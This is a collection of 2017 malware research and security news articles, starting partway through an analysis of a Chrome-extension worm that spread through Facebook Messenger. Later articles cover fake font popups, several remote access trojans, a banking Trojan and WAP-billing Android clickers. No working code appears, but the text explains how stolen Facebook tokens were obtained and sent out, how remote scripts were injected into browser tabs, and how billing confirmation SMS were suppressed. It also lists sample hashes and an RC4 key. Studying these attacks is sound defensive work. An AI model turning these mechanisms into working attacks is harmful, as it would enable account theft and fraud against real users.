This page will also ask you to install a Chrome Extension. Since you can install a Chrome Extension directly on the page, the only action the victim had to perform was to click “Add extension”. No other interaction after that point was needed from the victim for the attack to spread further.

Chrome Extension

Several different Chrome Extensions were used. All of the extensions were newly created and the code was stolen from legit extensions with similar names. The differences in the extensions’ Javascript code were the background.js and a modification in the manifest.json.

The manifest was changed to allow control over tabs and all URLs, and also to enable support for the background script:

The background script was obfuscated differently in all the Chrome Extensions we found, but the basic concept looked like this:

Obfuscated background script

This script was interesting in many ways.

First, the background script would fetch an external URL only if the extension was installed from the Chrome Webstore; a version installed locally using an unpacked extension would not trigger the attack.

The URL being fetched would contain a reference to another script. This script would be sent into a Javascript blob using URL.createObjectURL and then executed in the background script.

This new script from the blob would also be obfuscated. It looked like this:

What happens here is the following:
Add a listener to all tabs when the tab has loaded successfully.
When the tab is loaded, make a new request to another URL. If the response contains anything, it will send it to the tab that triggered it using executeScript. This will run the Javascript in the context of the tab making the request, basically injecting an XSS that will trigger directly.
Getting all the scripts

When doing the research trying to identify the file that was being injected, I noticed that the attackers’ command and control server did not always return any code. My guess is that they were able to trigger when the attack should spread or not either manually or by specify when the attack should start.

To avoid sitting and waiting for a request to hit, I built my own pseudo extension doing the same thing as they did, but instead of triggering the code, I saved it locally.

Browsing around for a while, I noticed I got a bunch of hits. Their endpoint was suddenly returning back code:

The code returned was not obfuscated in any way, and had a simple flow of what it should do. It was fully targeted towards Facebook.

The script did the following:

Check that the domain it ran on contained facebook.com
Extract the CSRF token for a requests on Facebook, called fb_dtsg. Check if it had already fetched the access token (being used to make authenticated calls to the Facebook API). If not, it would make a request which is commonly made on Android to get the access token using the CSRF token.
Send the access token + profile ID to an external site owned by the attackers.

Make sure that the platform functionality is enabled (disabling the platform kill-switch):
Create a legacy access token. It turns out that Facebook has deprecated their FQL API, which is an old way of talking with the Facebook API:

But the attackers found out that if you made an access token using the app called “Pages Manager for iOS”, the FQL API would still be enabled.
Now, let’s move on to the most interesting parts of what the script did.

Analytics for the attackers, liking a Facebook page

The script would like a page on Facebook that was hardcoded in the script. This was most likely used by the attackers to count the amount of infected users by keeping an eye on the amount of likes on this page.

Watching the page used during one phase of the attack, the amount increased fast, from 8,900 at one point:

and up to 32,000 just a few hours later:

It was also clear that they had control over when it should trigger or not using the script fetcher from the Command and Control, since the amount of likes increased at extremely varying speeds during the attack.

They also changed pages during the attack, most likely because they were closed down by Facebook.

Fetching your friends

Since the attackers now had an FQL-enabled access token, they could use the deprecated API to fetch the victim’s friends sorted by date of their online presence, getting the friends that were online at the time.

They randomized these friends picking 50 of them each time the attack would run only if the friends were marked as idle or online.

A link was then generated by a third domain, which only received the profile ID of the user. This site most likely created the PDF on Google Docs with the profile picture of the current victim and passed the public link back through a URL shortener.

After the link was fetched, a message was created randomly for each friend, but the link was reused among them.

Interesting details

Some parts of the injected code were never used, or were leftovers from previous attacks.

One part was the localization function to send messages in the proper locale of each friend. This was replaced by the random emoji in the live attack:


Some files on the domains used had some easy to guess PHP files still on the server such as login.php. That one exposed a login script to Facebook together with a hardcoded email address:


We noticed multiple versions of the injected Facebook script being used. At the end of the attack, the script only liked the Facebook page and did not spread at all. Also, the domain being used to gather access tokens was removed from the script.

Landing pages

As already mentioned, the script also enumerates which browser you are using. The Chrome extension part is only valid for victims using Google Chrome. If you are using a different browser, the code will execute other commands.

What makes this interesting is that they have added support for most of the operating systems; we were not able to collect any samples targeting the Linux operating system.

All of the samples that we collected where identified as Adware, and before the victim landed on the final landing page, they were redirected through several tracking domains displaying spam/ads. This is an indication that the people behind this scam were trying to earn money from clicks and distributing spam and ads.


MD5 (AdobeFlashPlayerInstaller.dmg) = d8bf71b7b524077d2469d9a2524d6d79
MD5 (FlashPlayer.dmg) = cfc58f532b16395e873840b03f173733
MD5 (MPlay.dmg) = 05163f148a01eb28f252de9ce1bd6978
These are all fake Adobe Flash updates, but the victim ends up at different websites every time, it seems that they are rotating a set of domains for this.

Mozilla Firefox

MD5 (VideoPlayerSetup_2368681540.exe) = 93df484b00f1a81aeb9ccfdcf2dce481
MD5 (VideoPlayerSetup_3106177604.exe) = de4f41ede202f85c370476b731fb36eb

“I was infected by this, what do I do?”

The Google Chrome Security Team has disabled all the malicious extensions, but when the attackers infected your Facebook profile they also stole an access-token from your Facebook account.

With this access-token the attackers will be able to gain access to your profile again, even if you have for example: Changed your password, signed out from Facebook or turned off the platform settings in Facebook:

We are currently discussing this with Facebook but at the moment it seems like there is no simple way for a victim to revoke the token the attackers stole.

It’s highly recommended that you update your Anti Virus solution because the malicious domains and scripts have been blocked.


The attack relied heavily on realistic social interactions, dynamic user content and legit domains as middle steps. The core infection point of the spreading mechanism above was the installation of a Chrome Extension. Be careful when you allow extensions to control your browser interactions and also make sure you know exactly what extensions you are running in your browser. In Chrome, you can write chrome://extensions/ in your URL field to get a list of your enabled extensions.

We would like to give out special thanks to the following people who helped us shut down the attack as much as possible:

Marc at CloudFlare
Trevor Pottinger at Facebook
April Eubank at Facebook
Rodrigo Paim at Facebook
Adam Rudderman and Jack Whitton of the Facebook Security team
Nav Jagpal at Google
Without your help this campaign would have been much more widespread. Thank you for your time and support! Also thanks to @edoverflow for poking at the obfuscated code at the same time as us.

Experts spotted a malware campaign using HoeflerText Popups to push RAT Malware
2.9.2017 securityaffairs

Experts spotted a new EITest campaign leveraging HoeflerText Popups to target Google Chrome users and push NetSupport Manager RAT or Locky ransomware
Security expert Brad Duncan with both the SANS Internet Storm Center and Palo Alto Networks’ Unit 42, has spotted a malware campaign leveraging bogus popups that alert users to a missing web-font.

The crooks are targeting Google Chrome and Firefox browser users, the researcher discovered the popups contain a malicious JavaScript file that delivers either the NetSupport Manager remote access tool (RAT) or Locky ransomware.

Duncan reported many similarities with the EITest malware campaign.

“The attackers behind the EITest campaign have occasionally implemented a social engineering scheme using fake HoeflerText popups to distribute malware targeting users of Google’s Chrome browser. In recent months, the malware used in the EITest campaign has been ransomware such as Spora and Mole.” reads the post published by PaloAlto Networks. “However, by late August 2017, this campaign began pushing a different type of malware. Recent samples are shown to infect Windows hosts with the NetSupport Manager remote access tool (RAT). This is significant, because it indicates a potential shift in the motives of this adversary.”

Victims are lured to a compromised website that generates a bogus popup message informing the user the webpage they are trying to view cannot display correctly because their browser hasn’t the correct “HoeflerText” font and suggest them to fix the issue downloading a Chrome Font Pack.

HoeflerText malware campaign

“However, when I tried these same links in Google Chrome, they displayed a fake notification stating: The “HoeflerText” font was not found.” Duncan wrote.

“These notifications also had an ‘update’ button. When I clicked it, I received a JavaScript file named Win.JSFontlib09.js. That JavaScript file is designed to download and install Locky ransomware,”

In another case, the same Chrome HoeflerText font update delivers the file “Font_Chrome.exe” file that delivers and installs NetSupport Manager RAT.

Duncan observed malicious spam messages including links to fake Dropbox pages that when visited showed bogus notification about the need of installing the HoeflerText font.

“If you viewed the pages in Chrome or Firefox, they showed a fake notification stating you don’t have the HoeflerText font. These fake notifications had an “update” button that returned a malicious JavaScript (.js) file.” said Duncan.

The expert tried different browsers and observed mixed behaviors, Tor and Yandex browsers both returned the same results as IE 11 and Microsoft Edge when viewing those fake Dropbox pages. Opera and Vivaldi returned the same HoeflerText notifications seen in Google Chrome.

“In recent days, I’ve noticed multiple waves of malspam every weekday. It gets a bit boring after a while, but as 2017-08-31 came to a close, I noticed a different technique from this malspam,” Duncan added.

Victims using Internet Explorer or Microsoft Edge on bogus webpages did not trigger the HoeflerText’ popup, rather, victims will get a fake anti-virus alert with a phone number for a tech support scam.

“Users should be aware of this ongoing threat. Be suspicious of popup messages in Google Chrome that state: The ‘HoeflerText’ font wasn’t found. Since this is a RAT, infected users will probably not notice any change in their day-to-day computer use. If the NetSupport Manager RAT is found on your Windows host, it is probably related to a malware infection,” Duncan concluded.

China-linked KHRAT Operators Adopt New Delivery Techniques

1.9.2017 securityweek Virus
A recently observed KHRAT remote access Trojan (RAT) infection campaign uses updated spear phishing, download and execution techniques, Palo Alto Networks security researchers warn.

KHRAT is a backdoor associated with the China-linked cyber espionage group known as DragonOK, which has been previously known to use malware such as NetTraveler (aka TravNet), PlugX, Saker, Netbot, DarkStRat, and ZeroT in attacks against organizations in Russia and other surrounding countries. The recent campaign featuring the RAT targets victims located in Cambodia.

The malware was designed to register victims using their machine’s username, system language and local IP address, while also providing attackers with the typical set of RAT features, including remote access to the victim system, keylogging, screenshot taking capabilities, remote shell access, and the like.

After comparing the new attacks with previous KHRAT campaigns, Palo Alto concluded that the malware’s authors have updated their spear phishing techniques and themes and are using multiple methods to download and execute additional payloads using built-in Windows applications. They also expanded their infrastructure mimicking Dropbox, a well-known cloud-based file hosting service.

Although not very prevalent, the RAT has registered an uptick in usage over the past couple of months, the researchers say. The attacks against Cambodian targets was discovered in June, when Palo Alto researchers stumbled upon a malicious Word document designed to contact a server supposedly belonging to Dropbox.

In addition to hiding its network traffic, the document also included the acronym MIWRMP, which refers to the Mekong Integrated Water Resources Management Project, a multi-million dollar project regarding water resources and fisheries management in North Eastern Cambodia, thus seeming legitimate.

The document prompts the user to enable macros, which allows embedded VBA code to run and perform malicious operations, including creating new scheduled tasks and calling functions to run JavaScript code.

The researchers also connected the document to the domain name update.upload-dropbox[.]com, which has been hosted on a compromised Cambodian government’s website. The sample fetched from the compromised government servers would launch the legitimate regsvr32.exe program, in an attempt to bypass included Windows protections.

Another component related to the campaign would download an .ico file meant to create three scheduled tasks and use regsvr32.exe to download and execute three other .ico files. A DLL component was also associated with the campaign, but wasn’t downloaded and executed, the researchers say.

While investigating the KHRAT dropper code, the security researchers also stumbled upon JavaScript code that allows the actor to monitor who is visiting their site. The code would gather data such as user-agent, domain, cookie, referrer and Flash version, and appears almost identical to that found on a blog hosted on the Chinese Software Developer Network (CSDN) website.

“This most recent campaign highlights social engineering techniques being used with reference and great detail given to nationwide activities, likely to be forefront of peoples’ minds; as well as the new use of multiple techniques in Windows to download and execute malicious payloads using built-in applications to remain inconspicuous which is a change since earlier variants,” Palo Alto notes.

The researchers conclude that the threat actors behind KHRAT have updated both the malware and their tactics, techniques and procedures (TTPs) over the course of 2017. These changes are meant to help the actor produce more successful attacks.

“Other notable actions by the threat actors included updated infrastructure purporting to be part of either the well-known cloud-based company, Dropbox, or a travel agency, likely to appear genuine, masquerading traffic under the premise of other applications to communicate with the attack infrastructure, some of which included compromised Cambodian Government servers,” the researchers conclude.

Backdoored RAT Builder Kit Offered for Free

1.9.2017 securityweek Virus
The builder kit of a remote access Trojan (RAT) that was initially spotted in early 2017 contains a backdoored module, Zscaler reports.

Dubbed Cobian and monitored since February this year, the RAT shows similarities to the njRAT/H-Worm family of threats, which has been around since 2013. Both the Cobian RAT control panel and features are similar to those of njRAT and H-Worm, the security researchers say.

Cobian RAT’s builder was seen advertised on multiple underground forums, where it was being offered for free. Apparently, the reason for this was simple: the builder kit includes a backdoor module designed to retrieve command and control (C&C) information from a predetermined URL controlled by the original author.

Because of this setup, the malware developer gains control of the infected systems, while relying on second-level operators to build and spread the RAT. The backdoor module provides the original malware author with full control over the systems infected with Cobian RAT and also allows it to modify the C&C server information configured by the second-level operators.

During analysis, Zscaler also noticed that Cobian includes a series of detection evasion mechanisms. The backdoor module is not activated if the machine name and username of the infected system are the same, and no traffic will be generated from the bot client to the backdoor C&C server in this case.

During a recent campaign, the malware was seen dropped via a ZIP archive masquerading as a Microsoft Excel spreadsheet. The executable payload was signed with an invalid certificate pretending to be from VideoLAN and was packed using a .NET packer, featuring the encrypted Cobian RAT payload embedded in the resource section. The dropper also included anti-debugging checks.

Once installed on the compromised system, the bot attempts to create a mutex to ensure only one instance of itself is running. It also creates a copy of itself as %TEMP%/svchost.exe, executes it and then terminates itself. To ensure persistence, the executed copy creates an autostart registry key.

The RAT’s main features are present in the njRAT as well, including: keylogging, screen capture, webcam capture, voice recorder, file browsing, remote command shell, support for dynamic plugins, and the ability to install/uninstall programs.

It can also terminate or restart the bot process, update the C&C list, work as a stress tester (flood attacks using UDP or TCP traffic), can run executable or script from local disk or remote URL, and steal passwords.

The bot spawns two threads in the background, one responsible for persistence and for taking screenshots, while the other meant to perform a regular check-in with the remote C&C server. The malware stores the C&C server address in the configuration function as a base64 encoded string.

“Cobian RAT appears to be yet another RAT that is spawned from the leaked njRAT code. It is ironic to see that the second level operators, who are using this kit to spread malware and steal from the end user, are getting duped themselves by the original author. The original author is essentially using a crowdsourced model for building a mega botnet that leverages the second level operators botnet,” Zscaler concludes.

Vxer is offering Cobian RAT in the underground, but it is backdoored
1.9.2017 securityaffairs

Malware writer is offering for free a malware dubbed Cobian RAT in the underground, but the malicious code hides an ugly surprise.
In the dark web, it is quite easy to find alone vxers and hacking forums that offer malware and customize them according to buyers’ needs.

Recently researchers from Zscaler have spotted a remote access trojan dubbed Cobian remote RAT that was offered for free in the underground. It is fairly elemental malicious code based on an old RAT known as njRAT, it implements common spying features such as keylogger, webcam hijacker, screen capturing and of course the ability to execute attackers’ code on the victim’s system.

“The Zscaler ThreatLabZ research team has been monitoring a new remote access Trojan (RAT) family called Cobian RAT since February 2017. The RAT builder for this family was first advertised on multiple underground forums where cybercriminals often buy and sell exploit and malware kits.” reads the analysis from Zscaler. “This RAT builder caught our attention as it was being offered for free and had lot of similarities to the njRAT/H-Worm family, which we analyzed in this report.”

Unfortunately, the Cobain RAT hides a malicious feature in an encrypted library, the code allows the author of the malware to take full control of machines infected with the RAT.

Cobian RAT builder

The code could be used by the author also to completely cut off the crooks who initially infected the machine with the Cobain RAT.

The malware researchers noticed that the backdoor module hidden in the Cobian builder kit communicates with a preset page on Pastebin that was managed by the original author. In this way, the malware gets the current address of the command and control servers run by the original writer, but it first checks for the presence of the second level operator online to avoid being detected.

The experts speculate the original author’s purpose is to build a massive botnet exploiting the effort of second operators in spreading the Cobian RAT.

“It is ironic to see that the second level operators, who are using this kit to spread malware and steal from the end user, are getting duped themselves by the original author. The original author is essentially using a crowdsourced model for building a mega Botnet that leverages the second level operators Botnet.” concluded. “The original author is essentially using a crowdsourced model for building a mega Botnet that leverages the second level operators’ Botnet.”

Gazer: A New Backdoor Targets Ministries and Embassies Worldwide
30.8.2017 thehackernews 

Security researchers at ESET have discovered a new malware campaign targeting consulates, ministries and embassies worldwide to spy on governments and diplomats.
Active since 2016, the malware campaign is leveraging a new backdoor, dubbed Gazer, and is believed to be carried out by Turla advanced persistent threat (APT) hacking group that's been previously linked to Russian intelligence.
Gazer, written in C++, the backdoor delivers via spear phishing emails and hijacks targeted computers in two steps—first, the malware drops Skipper backdoor, which has previously been linked to Turla and then installs Gazer components.
In previous cyber espionage campaigns, the Turla hacking group used Carbon and Kazuar backdoors as its second-stage malware, which also has many similarities with Gazer, according to research [PDF] published by ESET.
Gazer receives encrypted commands from a remote command-and-control server and evades detection by using compromised, legitimate websites (that mostly use the WordPress CMS) as a proxy.

Instead of using Windows Crypto API, Gazer uses custom 3DES and RSA encryption libraries to encrypt the data before sending it to the C&C server—a common tactic employed by the Turla APT group.
Gazer uses code-injection technique to take control of a machine and hide itself for a long period of time in an attempt to steal information.
Gazer backdoor also has the ability to forward commands received by one infected endpoint to the other infected machines on the same network.
So far ESET researchers have identified four different variants of the Gazer malware in the wild, primarily spying on Southeast European and former Soviet bloc political targets.
Interestingly, earlier versions of Gazer were signed with a valid certificate issued by Comodo for "Solid Loop Ltd," while the latest version is signed with an SSL certificate issued to "Ultimate Computer Support Ltd."
According to researchers, Gazer has already managed to infect a number of targets worldwide, with the most victims being located in Europe.

Jimmy Nukebot: from Neutrino with love
30.8.2017 Kaspersky
“You FOOL! This isn’t even my final form!”

In one of our previous articles, we analyzed the NeutrinoPOS banker as an example of a constantly evolving malware family. A week after publication, this Neutrino modification delivered up a new malicious program classified by Kaspersky Lab as Trojan-Banker.Win32.Jimmy.

NeutrinoPOS vs Jimmy

The authors seriously rewrote the Trojan – the main body was restructured, the functions were moved to the modules. One small difference that immediately stands out is in the calculation of checksums from the names of API functions/libraries and strings. In the first case, the checksums are used to find the necessary API calls; in the second case, for a comparison of strings (commands, process names). This approach makes static analysis much more complicated: for example, to identify which detected process halts the Trojan operation, it’s necessary to calculate the checksums from a huge list of strings, or to bruteforce the symbols in a certain length range. NeutrinoPOS uses two different algorithms to calculate checksums for the names of API calls, libraries and for the strings. They look like this:

Restored NeutrinoPOS code to calculate checksums for arbitrary strings and for API calls
In Jimmy, only one algorithm is used for these purposes – a slight modification of CalcCS from NeutrinoPOS. The final XOR with the fixed two-byte value was added to the pseudo-random generator.

Calculation of checksums in Jimmy
The Trojan has completely lost the functionality for stealing bank card data from the memory of an infected device; now, its task is limited solely to receiving modules from a remote node and installing them into the system. The scan of the infected host has been extended: in addition to the checks inherited from Neutrino, the Trojan also examines its own name – it should not be a checksum in the MD5, SHA-1, SHA-256 format. Or, alternatively, it should contain the ‘.’ symbol, indicating a subsequent extension (for example, ‘exe’). Plus, by using the assembly command cpuid, the Trojan gets information about the processor and compares it with the list of checksums “embedded” into it.

Additional Jimmy checks
The communication protocol with the C&C server also remains unchanged: the same exchange of “enter”, “success” in base64 commands is used, but now the answer is encrypted with RC4 beforehand and the key hardcoded in the body of the Trojan (a8A5QfZk3r7FHy9o6C2WpBc44TiXg93Y for the sample in question). The code for extracting the encryption key is here.

Analysis of modules

As mentioned above, the main body of the Trojan only receives modules – these contain the payload. We managed to get hold of new modules for web-injects, mining and a large number of updates for the main module in various droppers.

The miner is designed to extract the Monero currency (XMR). In the module code there is an identifier associated with a wallet for which the crypto currency is extracted, as well as the address of the pool. Monero is very popular with virus writers – it’s mined by SambaCry, which we described in June and Trojan.Win32.DiscordiaMiner that appeared shortly afterwards. By the way, the source code of the latter was made publicly available by the author. The reason for doing so was the same that prompted the author of NukeBot to do likewise: an attempt to stifle disagreements in forums and to avoid accusations of fraud (the repository with the code is currently unavailable).

Thanks to the identifier/pool pair, we got statistics on all the nodes working for this wallet. The start date of mining – 4 July – coincides with the compilation of the main body of the first discovered sample and is extremely close to the date of compilation of the dropper (06 July 13:14:55 2017 UTC), the main body (02 July 14:19:03 2017 UTC) and the modules for web injects (July 02, 14:18:39 2017 UTC). So it’s safe to say that Jimmy began to proliferate in early July.

It’s worth noting that the amount of money in the wallet is small – only ~ 0.55 XMR, which as of 21 August is only $45. Judging by the general decline and absence of payments, the authors quickly abandoned the use of miners or changed their wallet.

The web-inject modules are so called for their primary intended use, although they are also able to perform functions similar to those in NeutrinoPOS, i.e., take screenshots, “raise” proxy servers, etc. These modules are distributed in the form of libraries and their functions vary depending on the name of the process in which they are located. As you can see from the screenshot below, in three cases out of five the ChromeHook procedure is called for browsers. This is not surprising, considering the large number of Chrome-based browsers. Unfortunately, it was possible to restore the name from the checksum for only one of them – chrome.exe (0xFC0C7619). Checksums are calculated using the algorithm described in the previous section.

Restored code of the main procedure in the module of Jimmy web injects
Like NeutrinoPOS, Jimmy stores a number of parameters in the registry. In the sample in question, the data is in the HKEY_CURRENT_USER\Software\c2Fsb21vbkBleHBsb2l0Lmlt branch. For example, this is where the web-inject module receives the address of the currently used DNS server from – this is critical when using NamCoin-like addresses as a C&C server.

For Firefox and Internet Explorer, the function hook is performed by the straightforward substitution of the called function addresses in the loaded libraries (etc. InternetConnectW / PR_Read). With Chrome, things are a bit more complicated – the necessary libraries are linked statically. But the subsequent substitution of data using web injects coincides.

Restored web-inject processing code
So far we have only managed to get a test sample of the web injects (in the screenshot below); in the future the Trojan will most likely acquire ‘combat’ versions. Here you can find examples of web injects and the keys used. To recap, decryption entails decoding the string using base64 and then decrypting with RC4.

Request from Jimmy for web injects

Example of the Jimmy test web injects
In the pictures below several procedures in the source code of NukeBot and the restored code of Jimmy are compared. It can clearly be seen that they completely coincide.


In isolation from the previous modifications, the newly created Jimmy would not be of much interest to researchers. However, in this context, it is an excellent example of what can be done with the source code of a quality Trojan, namely, flexibly adapt to the goals and tasks set before a botnet to take advantage of a new source.


c989d501460a8e8e381b81b807ccbe90 (рассмотрен в статье)

Main body


Jimmy Banking Trojan Reuses NukeBot Code

30.8.2017 securityweek Virus 
A recently discovered modification of the Neutrino banking Trojan reuses parts of the NukeBot source code that was made publicly available earlier this year, Kaspersky Lab researchers discovered.

Dubbed Jimmy, the newly discovered malware shows close resemblance to NeutrinoPOS, but features a restructured main body, with functions moved to modules. Because of this change, the new Trojan no longer includes the functionality for stealing bank card data from the memory of an infected device, but is limited to receiving modules from a remote server and installing them.

The malware is able to conduct an extended scan of an infected host, including both checks inherited from Neutrino and the examination of its own name. Furthermore, using the assembly command cpuid, the threat retrieves information about the processor and compares it with checksums it contains.

Overall, however, the Trojan has been seriously rewritten, Kaspersky says: “One small difference that immediately stands out is in the calculation of checksums from the names of API functions/libraries and strings. In the first case, the checksums are used to find the necessary API calls; in the second case, for a comparison of strings (commands, process names). This approach makes static analysis much more complicated.”

While NeutrinoPOS uses two algorithms to calculate checksums for the names of API calls, libraries and strings, Jimmy has only one algorithm for all these purposes. However, the communication protocol with the command and control server remained unchanged, the researchers say.

A closer analysis of the Trojan reveals that the payload is included in the modules the main body receives. The modules include web-injects and mining capabilities for the Monero currency (XMR). Monero has become very popular with malware writers lately, and is even mined by SambaCry.

DiscordiaMiner, which had its source code made publicly available by the author for reasons similar to those that prompted the NukeBot developer to do the same (mainly to avoid accusations of fraud), also focused on mining Monero.

Jimmy’s mining module includes an identifier for a wallet for which the crypto currency is extracted, and the address of the pool, and Kaspersky was able to use these to determine that the Trojan started the mining operations close to its early July proliferation date.

In addition to being able to inject code into web pages, the web-inject modules can also take screenshots, create proxy servers, and perform other nefarious operations, similar to those in NeutrinoPOS. The modules are distributed in the form of libraries and feature different functions, based on the name of the process in which they are located.

Similar to NeutrinoPOS, Jimmy also stores a number of parameters in the registry. The researchers explain that they also managed to retrieve a test sample of the web injects, and that future iterations of the malware might “acquire ‘combat’ versions.”

Kaspersky also compared the restored code of Jimmy with the source code of NukeBot and discovered that they completely coincide in some instances. Thus, it’s clear that the author reused the code to build their own version of the malware.

“In isolation from the previous modifications, the newly created Jimmy would not be of much interest to researchers. However, in this context, it is an excellent example of what can be done with the source code of a quality Trojan, namely, flexibly adapt to the goals and tasks set before a botnet to take advantage of a new source,” Kaspersky concludes.

In an emailed comment to SecurityWeek, AlienVault security advocate Javvad Malik pointed out the risks posed by the availability of malware source code: “Once such Trojans or malware go open source, it has two main impacts. Firstly, it increases in popularity and use. But with this, the chances of it being detected and prevented by security tools also increases; so, the second impact is that others will increasingly modify the malware in order to bypass security controls. Organizations should invest in security technologies that are constantly updated with threat intelligence so that they can better detect and respond to new threats as they emerge.”

New multi platform malware/adware spreading via Facebook Messenger
26.8.2017 Kaspersky
One good thing about having a lot of Facebook friends is that you simply act as a honey pot when your friends click on malicious things. A few days ago I got a message on Facebook from a person I very rarely speak to, and I knew that something fishy was going on.

After just a few minutes analyzing the message, I understood that I was just peeking at the top of this iceberg. This malware was spreading via Facebook Messenger, serving multi platform malware/adware, using tons of domains to prevent tracking, and earning clicks. The code is advanced and obfuscated.

Here is a screenshot of the JavaScript, an potential injector. Filename is “injection.js” (ebc117c0cf03ad4b13184d1253862586)

The initial spreading mechanism seems to be Facebook Messenger, but how it actually spreads via Messenger is still unknown. It may be from stolen credentials, hijacked browsers or clickjacking. At the moment we are not sure because this research is still ongoing.

The message uses traditional social engineering to trick the user into clicking the link. The message reads “David Video” and then a bit.ly link.

The link points to a Google doc. The document has already taken a picture from the victim’s Facebook page and created a dynamic landing page which looks like a playable movie.

When the victim clicks on the fake playable movie, the malware redirects them to a set of websites which enumerate their browser, operating system and other vital information. Depending on their operating system they are directed to other websites.

This technique is not new and has a lot of names. I would like to describe it as a domain chain, basically just A LOT of websites on different domains redirecting the user depending on some characteristics. It might be your language, geo location, browser information, operating system, installed plugins and cookies.

By doing this, it basically moves your browser through a set of websites and, using tracking cookies, monitors your activity, displays certain ads for you and even, in some cases, social engineers you to click on links.

We all know that clicking on unknown links is not something that’s recommended, but through this technique they can basically force you to do so.

What I noticed during my research was that when changing the User-Agent header (browser information) the malware redirects you to different landing pages. For example, when using FIREFOX I was redirected to a website displaying a fake Flash Update notice, and then offered a Windows executable. The executable is flagged as adware.

When using the Google Chrome browser I was redirected to a website which mimics the layout of YouTube, even including the YouTube logo. The website then displays a fake error message tricking the user to download a malicious Google Chrome extension from the Google Web Store.

The Chrome Extension is a Downloader, which means that it downloads a file to your computer. At the time of writing, the file which should have been downloaded was not available.

One interesting finding is that the Chrome Extension has log files from the developers displaying usernames. It is unclear if this is related to the campaign, but it is still an amusing piece of information.

When using the OSX Safari browser I ended up on a similar website to the one I was directed to when using Firefox, but it was customized for OSX users. It was a fake update for Flash Media Player, and when I clicked the link an OSX executable .dmg file was downloaded. This file was also adware.

It has been a while since I saw these adware campaigns using Facebook, and its pretty unique that it also uses Google Docs, with customized landing pages. As far as I can see no actual malware (Trojans, exploits) are being downloaded but the people behind this are most likely making a lot of money in ads and getting access to a lot of Facebook accounts.

Please make sure that you don’t click on these links, and please update your antivirus!

WAP-billing Trojan-Clickers on rise
26.8.2017 Kaspersky
During the preparation of the “IT threat evolution Q2 2017” report I found several common Trojans in the “Top 20 mobile malware programs” list that were stealing money from users using WAP-billing – a form of mobile payment that charges costs directly to the user’s mobile phone bill so they don’t need to register a card or set up a user-name and password. This mechanism is similar to premium rate SMS messages but Trojans do not need to send any SMS in this case – they just need to click on a button on a web-page with WAP-billing.

From user’s perspective a page with WAP-billing looks like regular web-page. Usually such pages contain complete information about payments and a button. By clicking on this button user will be redirected to a mobile network operator server, which may show additional information and request user’s final decision about payment by clicking on another button. If the user connects to the Internet through mobile data, the mobile network operator can identify him/her by IP address. Mobile network operators charges users only if they are successfully identified and only after click on the button.

From a financial point of view, this mechanism is similar to the Premium rate SMS service – charge is directly applied to users’ phone bills. However, in this case Trojans do not need to send any SMS – just to click on button on a web-page with WAP-billing.

We hadn’t seen any Trojans like this in a while, but several of them appeared out of nowhere. Different Trojans from different cybercriminal groups targeting different countries (Russia and India) became common at the same time. Most of them had been under development since the end of 2016 / the beginning of 2017, but their prevalence increased only in the second half of Q2 2017. Therefore, I decided to take a closer look at these Trojans.

In general, these Trojans are doing similar things. First, they turn off WiFi and turn on mobile Internet. They do this because WAP-billing works only through mobile Internet. Then they open a URL which redirects to the page with WAP-billing. Usually, Trojans load such pages and click on buttons using JavaScript (JS) files. After that they need to delete incoming SMS messages containing information about subscriptions from the mobile network operator.

Furthermore, some of them have the ability to send premium rate SMS messages. In addition, some are exploiting Device Administrator rights to make it harder to delete the Trojan.


I started with Trojans that are detected as Trojan.AndroidOS.Boogr.gsh. These files are recognized as malicious by our system, based on machine learning algorithms. The most popular files detected in Q2 2017 by ML detection were Trojans abusing WAP-billing services. After analyzing them, I found that they belong to the Trojan-Clicker.AndroidOS.Ubsod malware family.

Part of Trojan-Clicker.AndroidOS.Ubsod code where Trojan opens URLs.
It is a small and simple Trojan that receives some URLs from its command and control server (CnC) and opens them. These URLs could just be AD URLs where the Trojan pretends that it is a type of advertising software by using class names like “ViewAdsActivity”. But, it can delete all incoming SMS messages that contain the text “ubscri” (part of “Subscription”) or “одпи” (part of “Подписка”, Subscription in Russian). Furthermore, it can turn off WiFi and turn on mobile data. Trojans need this because WAP-billing only works when the page is visited through mobile internet, not through WiFi.

Part of Trojan code to delete AoC (advice of charge) messages.
After analyzing these Trojans, I found that some of them (MD5 A93D3C727B970082C682895FEA4DB77B) also contain a different functionality – to decrypt and load (execute) additional executable files. This functionality is detected as Trojan-Dropper.AndroidOS.Ubsod. These Trojans, in addition to stealing money through WAP-billing services, were also executing another Trojan, detected as Trojan-Banker.AndroidOS.Ubsod.

Part of Trojan-Banker.AndroidOS.Ubsod code with some constants
An interesting thing about Trojan-Banker.AndroidOS.Ubsod was that it was distributed not only in other Trojans, but also as a standalone Trojan (MD5 66FE79BEE25A92462A565FD7ED8A03B4). It is a powerful Trojan with lots of capabilities. It can download and install apps, overlay other apps with its windows (mostly to steal credentials or credit card details), show ads, send SMS messages, steal incoming messages and even execute commands in the device shell. Furthermore, it has features that steal money by abusing WAP-billing services, which mean that in some cases infected users had two Trojans attacking the same thing.

Some of Trojan-Banker.AndroidOS.Ubsod commands
According to KSN statistics it was the most popular of all such Trojans, with almost 8,000 infected users in July 2017 from 82 countries. 72% of attacked users were in Russia.


Another malware family that has become popular during the last few months is Trojan-Clicker.AndroidOS.Xafekopy. This Trojan uses JS files to click on buttons on web-pages containing WAP billing to silently subscribe users to services. The most interesting thing is that these JS files look similar to Ztorg’s module JS files; they even have the same names for some functions. This Trojan was created by some Chinese-speaking developers (just like Ztorg) but mainly attacks Indian (37%) and Russian (32%) users.

Part of JS files used by Trojan-Clicker.AndroidOS.Xafekopy to click on buttons
This Trojan is distributed through ads masquerading as useful apps, mostly as battery optimizers. After installation, it acts like a useful app but with one difference – it loads a malicious library. This library decrypts and loads files from the assets folder of the installation package. These files decrypt and load another file from the assets folder which contains the main malicious functionality. It decrypts (yep, decryption again) JS files. Using these JS files it can bypass captcha forms and click on web-pages with WAP billing. By doing so it steals money from a user’s mobile accounts. It can also click on some ad pages to make money from ads.

While users see a “Battery Master” interface the Trojan is trying to steal money
The files with the main functionality (which was decrypted) contain URLs with WAP-billings. I was able to find only two different versions of this file – one version contains Indian links, another – Russian links.

It also can send SMS messages (most likely premium rate SMS). It steals incoming SMS messages and deletes some (most likely AoC messages).

According to KSN statistics, almost 40% of attacked users were in India, but in total we saw it attacking more than 5,000 users from 48 different countries in July 2017.


The main purpose of Trojan-Clicker.AndroidOS.Autosus.a is to steal a user’s money by clickjacking pages with WAP-billing. To do so, the Trojan receives the JS file and URL to click on. It also can hide from user’s incoming SMS using rules received from the CnC.

Part of Trojan-Clicker.AndroidOS.Autosus.a code
